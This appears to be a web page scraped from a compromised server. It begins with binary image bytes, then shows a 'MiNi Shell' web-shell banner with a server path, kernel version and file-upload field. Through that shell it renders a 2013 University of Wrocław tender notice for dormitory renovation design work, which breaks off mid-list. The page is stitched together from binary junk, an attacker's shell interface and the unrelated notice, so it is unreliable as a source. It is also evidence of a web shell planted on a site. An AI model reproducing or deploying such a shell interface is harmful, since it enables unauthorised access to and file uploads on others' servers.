JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20130411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20130411/142168-N-2013.html

<p class="kh_header"><b>Wrocław: Wykonanie dokumentacji projektowo-kosztorysowej remontu i przebudowy domów studenckich Uniwersytetu Wrocławskiego. 4 Zadania.</b><br>
<b>Numer ogłoszenia: 142168 - 2013; data zamieszczenia: 11.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Wrocławski , pl. Uniwersytecki 1, 50-137 Wrocław, woj. dolnośląskie, tel. 071 3752234, faks 071 3752472.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bzp.uni.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo-kosztorysowej remontu i przebudowy domów studenckich Uniwersytetu Wrocławskiego. 4 Zadania..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie dokumentacji projektowo-kosztorysowej remontu i przebudowy domów studenckich Uniwersytetu Wrocławskiego. 4 Zadania:
Zadanie nr 1 - Wykonanie dokumentacji projektowo-kosztorysowej remontu kanalizacji sanitarnej w domach studenckich: Ołówek przy pl. Grunwaldzkim 30, Kredka przy ul. Grunwaldzkiej 69 oraz w łączniku pomiędzy ww domami.
Zadanie nr 2 - Wykonanie dokumentacji projektowo-kosztorysowej remontu instalacji centralnego ogrzewania polegającego na demontażu istniejących zaworów grzejnikowych i podpionowych oraz montażu nowych w domach studenckich Uniwersytetu Wrocławskiego: Dwudziestolatka, ul. Piastowska 1, Słowianka, pl. Grunwaldzki 26 i Parawanowiec, pl. Grunwaldzki 28 
Zadanie nr 3 - Wykonanie dokumentacji projektowo - kosztorysowej remontu polegającego na wymianie stolarki okiennej na poziomie piwnic i przyziemia w domach studenckich: Ołówek przy pl. Grunwaldzkim 30 oraz Kredka przy ul. Grunwaldzkiej 69 oraz wymianie stolarki okiennej i drzwiowej wraz z przebudową w jednym pomieszczeniu w łączniku pomiędzy ww domami.
Zadanie nr 4 - Wykonanie  dokumentacji projektowo-kosztorysowej montażu systemu SAP w łączniku między domami studenckimi: Ołówek i Kredka przy ul. Bujwida 25 oraz montażu dodatkowych kamer telewizji dozorowej CCTV na zewnątrz domu studenckiego Kredka przy ul. Grunwaldzkiej 69 i na zewnątrz ww łącznika..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonali, a w przypadku świadczeń okresowych lub ciągłych wykonują usługi w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej jedną usługę (jedna usługa oznacza usługę wykonywaną na podstawie jednej umowy): 
Dla Zadania 1: polegającą na wykonaniu dokumentacji projektowo-kosztorysowej remontu lub budowy kanalizacji sanitarnej w obiekcie budowlanym o kubaturze minimum 25000 m3 o wartości tej dokumentacji 20 000 zł brutto.
Dla Zadania 2: polegającą na wykonaniu dokumentacji projektowo-kosztorysowej remontu lub budowy instalacji centralnego ogrzewania w obiekcie budowlanym o kubaturze minimum 25000 m3 o wartości tej dokumentacji 30 000 zł brutto.
Dla Zadania 3: polegającą na wykonaniu dokumentacji projektowo-kosztorysowej montażu stolarki okiennej i drzwiowej o wartości tej dokumentacji 10 000 zł brutto
Dla Zadania 4: polegającą na wykonaniu dokumentacji projektowo-kosztorysowej montażu systemu SAP i kamer telewizji dozorowej o wartości tej dokumentacji 5 000 zł brutto
Zamawiający zastrzega, że są to główne usługi jakie powinien wykazać wykonawca.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w rozdziale V w pkt 1 ppkt 1) i 2) niniejszej SIWZ.
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej wykonawców ocena ww. warunku dotyczyć będzie wszystkich wykonawców łącznie.
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia-nie spełnia.
Do przeliczenia wartości występujących w innych walutach niż PLN Zamawiający jako kurs przeliczeniowy przyjmie średni kurs Narodowego Banku Polskiego (NBP), z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, przy czym średnie kursy walut dostępne są pod następującym adresem internetowym: http:www.nbp.plhome.aspx?f=Kursykursy.htm</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował następującymi osobami posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą z dnia 7 lipca 1994r. - Prawo Budowlane (tj.Dz. U. z 2010 r. nr 243, poz. 1623 z późn. zm.) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z dnia 16 maja 2006 r. nr 83 poz. 578) lub których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych:
Zadanie 1: 
a)projektant posiadający uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - bez ograniczeń
Zadanie 2: 
a)projektant posiadający uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - bez ograniczeń
Zadanie 3: 
a)projektant - posiadający uprawnienia budowlane do projektowania w specjalności architektonicznej - bez ograniczeń 
b)projektant posiadający uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej - bez ograniczeń
c)projektant posiadający uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - bez ograniczeń
Zadanie 4:
a)projektant posiadający uprawnienia budowlane do projektowania w specjalności telekomunikacyjnej lub instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - bez ograniczeń
Ocena spełnienia przedstawionego warunku zostanie dokonana w oparciu o przedłożone dokumenty i oświadczenia wg formuły spełnia - nie spełnia.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy Pzp, określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie.
W celu potwierdzenia spełnienia niniejszego warunku Wykonawcy zobowiązani są przedłożyć dokumenty wymienione w rozdziale V w pkt 1 ppkt 1), 3) i 4) SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca zobowiązany jest wskazać co najmniej jedną należycie wykonaną usługę (jedna usługa oznacza usługę wykonywaną na podstawie jednej umowy): 
Dla Zadania 1: polegającą na wykonaniu dokumentacji projektowo-kosztorysowej remontu lub budowy kanalizacji sanitarnej w obiekcie budowlanym o kubaturze minimum 25000 m3 o wartości tej dokumentacji 20 000 zł brutto 
Dla Zadania 2: polegającą na wykonaniu dokumentacji projektowo-kosztorysowej remontu lub budowy instalacji centralnego ogrzewania w obiekcie budowlanym o kubaturze minimum 25000 m3 o wartości tej dokumentacji 30 000 zł brutto.
Dla Zadania 3: polegającą na wykonaniu dokumentacji projektowo-kosztorysowej montażu stolarki okiennej i drzwiowej o wartości tej dokumentacji 10 000 zł brutto
Dla Zadania 4: polegającą na wykonaniu dokumentacji projektowo-kosztorysowej montażu systemu SAP i kamer telewizji dozorowej o wartości tej dokumentacji 5 000 zł brutto;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz Oferty - załącznik nr 1 do SIWZ;
2)Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania 
oferty nie wynika z innych dokumentów do niej załączonych - w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez notariusza;
3)W przypadku złożenia oferty wspólnej przez kilku Wykonawców, należy przedstawić pełnomocnictwo, w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza, ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna wskazywać rodzaj uprawnień, do których upoważniony jest Pełnomocnik tj np. podpisanie oferty, potwierdzenie za zgodność z oryginałem kopii dokumentów, składanie oświadczeń woli i wiedzy itp.;
4)Jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili jej zawarcia, Zamawiający może odstąpić od umowy w terminie do 30 dni od powzięcia wiadomości o tych okolicznościach. W przypadku, o którym mowa powyżej Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy (art. 145 ustawy Prawo zamówień publicznych).
2.Ze względów losowych dopuszcza się zmianę przedstawicieli stron posiadających wskazane w umowie kwalifikacje
3.W przypadku zmiany stawki podatku VAT, będzie ona dostosowana do obowiązujących przepisów przy zachowaniu zaoferowanej przez Wykonawcę wartości wynagrodzenia brutto.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uni.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Biuro Zamówień Publicznych, ul. Kuźnicza 49/55, 50-138 Wrocław, pok.100 I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2013 godzina 10:00, miejsce: Biuro Zamówień Publicznych, ul. Kuźnicza 49/55, 50-138 Wrocław, pok.100 I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin wykonania zamówienia: 
Dla Zadania 1: do 5 miesięcy od dnia podpisania umowy
Termin realizacji Etapu I - obejmujący wykonanie : projektu budowlanego i dostarczenie Zamawiającemu kopii  wniosku o pozwolenie na budowę wynosi : do 3 miesięcy od dnia podpisania umowy. 
Termin realizacji Etapu II - obejmujący wykonanie: projektu budowlanego wraz z  decyzją o pozwoleniu na budowę wykonanie: projektu wykonawczego, przedmiaru robót, kosztorysu inwestorskiego, specyfikacji technicznych wykonania i odbioru robót budowlanych, informacji BIOZ wynosi : do 5 miesięcy od dnia podpisania umowy.
Dla Zadania 2: do 4 miesięcy od dnia podpisania umowy
Termin realizacji Etapu I - obejmujący wykonanie: projektu budowlanego i dostarczenie Zamawiającemu kopii zgłoszenia rozpoczęcia robót złożonego w UM Wrocławia - w Wydziale Architektury i Budownictwa wynosi: do 3 miesięcy od dnia podpisania umowy.
Termin realizacji Etapu II - obejmujący wykonanie: projektu budowlanego wraz z  pisemnym zapewnieniem braku sprzeciwu wobec rozpoczęcia robót, projektu wykonawczego, przedmiaru robót, kosztorysu inwestorskiego, specyfikacji technicznych wykonania i odbioru robót budowlanych wynosi: do 4 miesięcy od dnia podpisania umowy.
Dla Zadania 3: do 4 miesięcy od dnia podpisania umowy.
Termin realizacji Etapu I - obejmujący wykonanie: projektu budowlanego i dostarczenie Zamawiającemu kopii  wniosku o pozwolenie na budowę wynosi : do 2 miesięcy od dnia podpisania umowy. 
Termin realizacji Etapu II - obejmujący wykonanie: projektu budowlanego wraz z  decyzją o pozwoleniu na budowę, wykonanie: projektu wykonawczego, przedmiaru robót, kosztorysu inwestorskiego, specyfikacji technicznych wykonania i odbioru robót budowlanych, informacji BIOZ wynosi: do 4 miesięcy od daty podpisania umowy.
Dla Zadania 4: do 3 miesięcy od dnia podpisania umowy.
Termin realizacji Etapu I - obejmujący wykonanie: projektu budowlanego i dostarczenie Zamawiającemu kopii zgłoszenia rozpoczęcia robót złożonego w UM Wrocławia - w Wydziale Architektury i Budownictwa wynosi: do 2 miesięcy od daty podpisania umowy.
Termin realizacji Etapu II - obejmujący wykonanie: projektu budowlanego wraz z  pisemnym zapewnieniem braku sprzeciwu wobec rozpoczęcia robót, wykonanie: projektu wykonawczego, przedmiaru robót, kosztorysu inwestorskiego, specyfikacji technicznych wykonania i odbioru robót budowlanych wynosi: do 3 miesięcy od daty podpisania umowy.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje zastosowania dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Wykonanie dokumentacji projektowo-kosztorysowej remontu kanalizacji sanitarnej w domach studenckich: Ołówek przy pl. Grunwaldzkim 30, Kredka przy ul. Grunwaldzkiej 69 oraz w łączniku pomiędzy ww domami..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zinwentaryzować instalację kanalizacyjną łącznie z odcinkami do wyłączenia i przedstawić wnioski Zamawiającemu (nanieść całą istniejącą instalację na dokumentację projektową i zaznaczyć odcinki kwalifikujące się do wymiany)
2.Zprojektować wymianę poziomów kanalizacji węzłów sanitarnych i węzłów kuchennych w piwnicach (dwa poziomy piwnic). Uwzględnić podłączenie pionów kanalizacji deszczowej
3.Przedstawić sposób demontażu pionów i poziomów żeliwnych w piwnicach (zabezpieczenie przed przesuwaniem już wykonanych odcinków)
4.Zaprojektować wymianę pionów kanalizacji sanitarnej obsługujących węzły sanitarne w Ołówku - 8 pionów
5.Zaprojektować wymianę odcinków pionów kuchennych w piwnicach
6.Zaprojektować podejścia od misek ustępowych i innych przyborów sanitarnych konieczne do wymiany podczas remontu pionów kanalizacyjnych w Ołówku
7.Zaprojektować nowe kominki wywiewne na dachu
8.Zaprojektować wymianę przyłączy kanalizacji sanitarnej do pierwszej studzienki - 16 przyłączy
9.Zaprojektować wymianę 15m rury wodociągowej
10.Zaprojektować wymianę tych odcinków kanalizacji, których wymiana okaże się konieczna w trakcie inwentaryzacji
11.W przedmiarze i kosztorysie oprócz demontaży i robót instalacyjno-montażowych przewidzieć m.in.: zamurowanie przebić, malowanie ścian po demontażu, wywóz gruzu oraz załadunek, licowanie płytkami, prace towarzyszące (przeniesienie przyborów z szafkami), transport i rozładunek złomu pochodzącego z demontażu. 
Technologia wykonywania robót powinna uwzględniać, że remont odbywać się będzie w czynnym obiekcie. Przedmiary i kosztorysy muszą przewidywać etapowanie inwestycji (po dwa etapy w każdym akademiku). W kosztorysie ująć demontaż i ponowny montaż stalowo - betonowych drzwi (ciężar 70 kg) na każdej kondygnacji i przy każdym pionie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Wykonanie dokumentacji projektowo-kosztorysowej remontu instalacji centralnego ogrzewania polegającego na demontażu istniejących zaworów grzejnikowych i podpionowych oraz montażu nowych w domach studenckich Uniwersytetu Wrocławskiego: Dwudziestolatka, ul. Piastowska 1, Słowianka, pl. Grunwaldzki 26 i Parawanowiec, pl. Grunwaldzki 28.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zinwentaryzować instalację c.o. 
2.Obliczyć aktualne zapotrzebowanie na ciepło pomieszczeń
3.Przeliczyć instalację c.o. (z pełną regulacją) uwzględniając istniejące grzejniki i średnice rur, zrównoważyć hydraulicznie całą instalację. Dobrać nowe zawory regulacyjne, odpowietrzające i odwadniające. 
